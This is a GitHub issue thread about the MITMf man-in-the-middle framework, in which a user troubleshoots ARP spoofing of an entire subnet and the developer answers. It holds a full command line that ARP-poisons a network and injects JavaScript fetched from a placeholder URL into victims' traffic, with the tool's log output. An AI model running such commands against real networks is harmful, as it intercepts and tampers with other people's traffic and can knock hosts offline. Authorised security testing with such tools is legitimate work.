### ISSUE TITLE
Target Problem

### ISSUE THREAD

**Issue by defaltdobrasao** [byt3bl33d3r/MITMf#47]
Hi! nice framework man, but i'm having a problem when using spoof and arp plugins without setting a target.
If i set a single ip address as target everything works very well, but if i want to poison arp of all the subnet without setting "--target", who has been poisoned can't browse the internet..
i downloaded the framework from here, i want to install that by apt repo but i dont think that this is the problem.
Thank you

**Comment by byt3bl33d3r** [comment]
@defaltdobrasao can you give me the full command string you used? also fyi arp-spoofing a vm usually messes things up

**Comment by defaltdobrasao** [comment]
yes,

##################################################################
python mitmf.py -i br0 --spoof --arp --gateway routerIP --inject --js-url http://example.com/ex.js
[*] MITMf v0.9 started... initializing plugins and modules
[*] Inject plugin online
[*] ARP Spoofing enabled
[*] Spoof plugin online
[*] Setting up iptables

[*] sslstrip v0.9 by Moxie Marlinspike running...
[*] sergio-proxy v0.2.1 online
2015-02-28 21:26:41 Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address 'www.putty.org' not found: [Errno -5] No address associated with hostname.
]
^C
[*] Flushing iptables
[*] Re-arping network
.....
Sent 5 packets.
#####################################################

you can see here the error when trying to browse a website on a machine in the subnet, i'm using a dns in internal network for br0, maybe i have to add dns server to a whitelist if possible?

**Comment by byt3bl33d3r** [comment]
so if i understand correctly your using an internal dns server?

**Comment by defaltdobrasao** [comment]
yes, sorry for my english

**Comment by byt3bl33d3r** [comment]
@defaltdobrasao it should work even with internal DNS servers, having said that this really depends on your network configuration.

Quite frankly though in most cases ARP spoofing a subnet is not recommended since you will most likely cause packet loss or DOS

**Comment by defaltdobrasao** [comment]
@byt3bl33d3r so if i want to arpspoof only a couple of ip instead of one whitout change sourcecode is possible?

**Comment by byt3bl33d3r** [comment]
currently no, you can only specify a single target or the whole subnet.

**Comment by defaltdobrasao** [comment]
ok thankyou very much man for your help
i will study some python then take a look at the code
